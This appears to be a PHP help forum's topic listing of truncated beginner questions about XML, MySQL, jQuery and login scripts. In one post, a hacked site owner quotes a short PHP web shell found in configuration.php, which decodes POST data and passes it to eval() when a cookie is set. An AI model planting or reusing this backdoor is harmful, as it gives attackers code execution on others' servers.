39,317 Topics
 | |
 | Hello, I was reading web security stuffs and found that user can inject malicious codes mostly JS in forms. Now, What about CKFinder/TinyMCE et al? They obviously produce html and any stripping will destroy the article formatting. bad enough they have a "code mode" where user can enter html directly. … |
 | I need some help, some of the recent posts I made probably made no sense. lol. XML file im working with: [url]http://www.vafinancials.com/web/hubs_xml.php?id=18686[/url] I had an Idea but am unsure of how to use it. I thought of using something like a SQL query to echo out certain hub info. Like … |
| | hi, Hours i've spent looking and the answer still eludes me. I am trying to create a dynamic hyperlink, based on the current page url and information appended from a text entry box ideally using PHP / javascript / iframe. I do not want to reload the page to get … |
| | My site was hacked. They inserted this into livesite on configuartion.php [code]if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) { $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) eval($d);} echo '<name=c></textarea>';exit;}[/code] what does it say??? Thanks |
| | how to pass javascript value to php without get or post...mean in the same page..without submit |
 | I am populating combobox on checkbox checked or not click event. Here is code. I am not solving the bug, JS runs on chrome but not in both IE and Firefox. checkbox <input type="checkbox" onclick="selectinactivebatch(this.value);" id="inactive_batch" name="inactive_batch" <?php if(isset($_POST)) echo "checked";?>> AJAX Code function selectinactivebatch(checkboxvalue) { var check; if(checkboxvalue=='on') check=1; … |
| | Hi, (PHP & MYSQL) I'm looking for some advice whilst creating my image gallery. I'm using the $_GET to bring the variables I need onto a new page, which will give more details about each product. My gallery works fine and I then have all the details coming onto the … |
| | Dear All, I have an application where I have to time to time keep checking the db if there is any update I got to run some function. So what is recommended cron job or php daemon. |
| | Hi everyone. I am having some trouble with my PHP and jQuery. [CODE] <script> function solveError(id) { $('#loading').html('<img src="resources/images/loading.gif" width="16" height="16" />').load('solve_error.php?id=' + id + ''); } </script> [/CODE] And here is the PHP [CODE]<a href="#" title="Solved" onclick="solveError('<?php echo $error['error_id']; ?>');"><img src="resources/images/icons/tick_circle.png" alt="Solved" /></a>[/CODE] When I get rid of the … |
| | My php code to read my xml is there anyway to sort by date or event_id? [CODE]<?php $doc = new DOMDocument(); $doc->load( '../events.xml' ); $date = array(); // initialize data array $books = $doc->getElementsByTagName( "event" ); foreach( $books as $book ) { $evts = $book->getElementsByTagName( "event_id" ); $evt = $evts->item(0)->nodeValue; … |
| | Hi everyone I'm currently working on a survey project,now my problem is that my while loop isn't giving the correct results. i have a mysql table that looks like this. sectionID SurveyID sectionTitle sectionInstructions 1 2 section1 answer the following questions 2 2 section2 answer the following questions Ive already … |
| | Hi, I have used mod_rewrite quite a bit so I am surprised I cannot get this to work. I think the issue may be with the ? in the url but not sure. Background: LAMP server, php/Mysql site with mod_rewrite set up and working correctly. The main rewrite rule is … |
| | I have a string [CODE]$var1 = colors<select><option value = 'blue'></option></select>[/CODE] I can get the value colors as a string with this statement [CODE]$needle1 = "<select>"; $result_string1 = substr("$var1",0,strpos($var1,$needle1));[/CODE] [CODE]echo "$result_string1";[/CODE] will give me [CODE]colors. [/CODE] Then I want to get everything between <select> and </select> so I use the following … |
| | Hi everyone, i have created a sql table to store hindi data. it works fine. Now i want to store data in this sql table from an Excel sheet. i want to know which hindi font i have to use in excel sheet so it will store hindi data in … |
| | I have a string "<select><option value = 'LB1'></option></select>" What I want to do is replace only the <select> with <select name = "somename">. Currently, i have a preg_replace statement that replaces the </select> statement also. How can I prevent this. My current code is $string = "<select><option value = 'LB1'></option></select>" … |
 | I want to add something to the script below that, prior to insert, check to see if the $CigarID already exists for the $UserID. If so, I want it to do an update and increase the $Quantity by whatever the user inputs. If the value doesn't exist, then insert the … |
| | Hi I need some help with this.. I have tables in sql with the following values; [B]Tbl name -[/B] members memberid [B]- primary key[/B] Username Password [B]Tbl name -[/B]Orders Orderid -[B]primary key[/B] memberid - [B]foreign key[/B] orderno I want to be able to grab the order numbers by the specific … |
| | I am wondering what people's opinions might be about using the SHA1 hash of the user's password for one of my session cookie values; bad idea? |
| | I found a change password script but i need to modify it to change the password in the "profiles" table and the "password " the username row is "username" row. Here is the code: [code=php] <? //*************************************** // This is downloaded from www.plus2net.com // /// You can distribute this code … |
 | I get the following error : Parse error: syntax error, unexpected T_STRING in /Library/WebServer/Documents/MyProject5/menus.php on line 48 This is the code [CODE] <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Date Menus</title> </head> <body> <?php //Script 10.1 - menus.php //This script defines and … |
| | Trying to learn PHP from a book and I swear I'm going balder by the minute!! Anyway heres my predicament; I want to display some simple incrementing data from a PHP loop within a table. So that each cell within the table displays a different value ie. cell 1 displays … |
| | I had a file info.php with class named xyz and functions within it, I am trying to fetch data from data base from another file show.php..but it is not working and shows "Notice: Undefined variable $info"....is there any help wht am i doing wrong... my code is.. in dblink() // …  |
| | Let's say I have the majority of my site in the 'root' WWW directory on the server, such as: [url]www.domain.com/index.php[/url] My current header & footer files are set to respect this configuration and work beautifully. I am now in the process however of creating a new directory which will be … |
| | i have a little syntax problem in php mysql, and i cant figure it out, hoping that u guys can help me out....mysql error and code are below Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right …  |
| | Hi, Please help me out. 1. Getting HYPERLINK value from page1 and saving in page2 using GET method.($re=$_GET[variable];) 2. Passing this value in -> select query 3. Displaying my output - correctly(in each and every value, there is an SUBMIT button.) 4. My Form Action is page2 itself. 5. Due …  |
| | Hi all I have been looking at the following upside down and sideways for a day now. I have a PHP page that is making use of a session value in an SQL query. The query requires an integer (it's searching on the numeric index of a table in the … |
| | Anybody know what version of vbulletin Daniweb is running? I help run a huge vbulletin forum and really like a lot of the features here so curious if we're running the same versions. Does seem like there is a lot of "custom" hacks being done though here. Danny  |
| | Hi i have problem in my login code. Firts someone fill in login informations this is checking code [CODE] // mysql connection $username=$_POST['username']; $password=md5($_POST['password']); $username = stripslashes($username); $password = stripslashes($password); $username = mysql_real_escape_string($username); $password = mysql_real_escape_string($password); $sql="SELECT * FROM users WHERE username = '$username' and password = '$password'"; $result=mysql_query($sql); $count=mysql_num_rows($result); … |
| | I have this page that you can do a search on the site. However, if I do a search that contains an apostrophe ('), it breaks and doesn't display anything although I have entries that have them. Does an easy fix exist for this problem? This is an example of … |
| | I need a lost password script for my existing login script. I need one that sends an email to the person once they enter their username. It is in a database with other things but the tables name is "profiles". The rows in that table are "id" "email" "username" "password". …  |
The End.